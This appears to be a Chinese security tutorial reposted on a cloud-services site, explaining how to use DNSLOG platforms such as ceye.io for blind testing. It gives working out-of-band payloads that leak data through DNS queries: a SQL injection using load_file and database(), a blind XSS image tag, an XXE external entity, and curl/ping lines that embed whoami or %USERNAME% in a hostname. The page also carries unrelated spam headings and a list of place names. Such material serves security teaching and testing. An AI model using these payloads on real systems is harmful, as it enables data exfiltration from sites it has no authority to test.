中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么合理利用DNSLOG進行無回顯安全測試

發布時間:2022-01-10 11:22:32 來源:億速云 閱讀:189 作者:柒染 欄目:安全技術

怎么合理利用DNSLOG進行無回顯安全測試,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

在實際測試一些網站的安全性問題的時候,有些測試命令執行后是無回顯的,我們可以寫腳本來進行盲注,但有些網站會封禁掉我們的ip地址,這樣我們可以通過設置ip代理池解決,但是遇到盲注往往效率很低,所以產生了DNSlog注入。

在使用dnslog之前我們需要先了解一下反引號符號:
符號:`
名稱:反引號,上分隔符
位置:反引號,這個字符一般在鍵盤的左上角,數字1的左邊,不要將其同單引號混淆
作用:反引號括起來的字符串被shell解釋為命令行,在執行時,shell首先執行該命令行,并以它的標準輸出結果取代整個反引號(包括兩個反引號)部分。
怎么合理利用DNSLOG進行無回顯安全測試
DNSlog回顯測試如下:
首先需要有一個可以配置的域名,比如:ceye.io,然后通過代理商設置域名 ceye.io 的 nameserver 為自己的服務器 A,然后再服務器 A 上配置好 DNS Server,這樣以來所有 ceye.io 及其子域名的查詢都會到 服務器 A 上,這時就能夠實時地監控域名查詢請求了,圖示如下。
怎么合理利用DNSLOG進行無回顯安全測試
DNS在解析的時候會留下日志,咱們這個就是讀取多級域名的解析日志,來獲取信息
簡單來說就是把信息放在高級域名中,傳遞到自己這,然后讀取日志,獲取信息。
這樣說原理很抽象,下面通過實際例子看下。
http://ceye.io 這是一個免費的記錄dnslog的平臺,我們注冊后到控制面板會給你一個二級域名:xxx.ceye.io,當我們把注入信息放到三級域名那里,后臺的日志會記錄下來。
怎么合理利用DNSLOG進行無回顯安全測試

0x01SQL盲注
就以sql盲注為例。深入理解下DNSlog注入過程:
通過DNSlog盲注需要用的load_file()函數,所以一般得是root權限。show variables like '%secure%';查看load_file()可以讀取的磁盤。
1、當secure_file_priv為空,就可以讀取磁盤的目錄。
2、當secure_file_priv為G:\,就可以讀取G盤的文件。
3、當secure_file_priv為null,load_file就不能加載文件。
怎么合理利用DNSLOG進行無回顯安全測試
通過設置my.ini來配置。secure_file_priv=""就是可以load_flie任意磁盤的文件。
怎么合理利用DNSLOG進行無回顯安全測試
mysql命令行執行:select load_file('\\afanti.xxxx.ceye.io\aaa');其中afanti就是要注入的查詢語句
查看平臺,dnsLog被記錄下來。
怎么合理利用DNSLOG進行無回顯安全測試
load_file()函數可以通過dns解析請求。
以sql-labs第五關:
payload:' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)-- -+
執行的sql語句:SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)
查看dnslog日志,發現security數據庫被查詢出來:
怎么合理利用DNSLOG進行無回顯安全測試

0x02 XSS(無回顯)
通過盲打,讓觸發者瀏覽器訪問預設至的鏈接地址,如果盲打成功,會在平臺上收到如下的鏈接訪問記錄:
payload:><img src=http://xss.xxxx.ceye.io/aaa>讓src請求我們的dnslog平臺
怎么合理利用DNSLOG進行無回顯安全測試

0x03 ×××F(無回顯)
payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>
0x04命令執行(無回顯)
當 ping 一個域名時會對其進行一個遞歸 DNS 查詢的過程,這個時候就能在后端獲取到 DNS 的查詢請求,當命令真正被執行且平臺收到回顯時就能說明漏洞確實存在。
Linux
curl http://haha.xxx.ceye.io/`whoami<br/>pingwhoami`.xxxx.ceye.io

Windows
ping %USERNAME%.xxx.ceye.io

怎么合理利用DNSLOG進行無回顯安全測試

怎么合理利用DNSLOG進行無回顯安全測試

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

葫芦岛市| 湟源县| 廉江市| 海盐县| 玉龙| 介休市| 伊金霍洛旗| 呈贡县| 赫章县| 怀化市| 石台县| 郑州市| 平原县| 苏尼特左旗| 离岛区| 保山市| 如东县| 曲沃县| 彭山县| 固阳县| 林芝县| 互助| 广昌县| 临高县| 昔阳县| 大埔区| 墨脱县| 丰顺县| 岳西县| 麦盖提县| 礼泉县| 高淳县| 宁陕县| 蚌埠市| 阿克陶县| 武鸣县| 贵南县| 漳州市| 桃园市| 余干县| 湘阴县|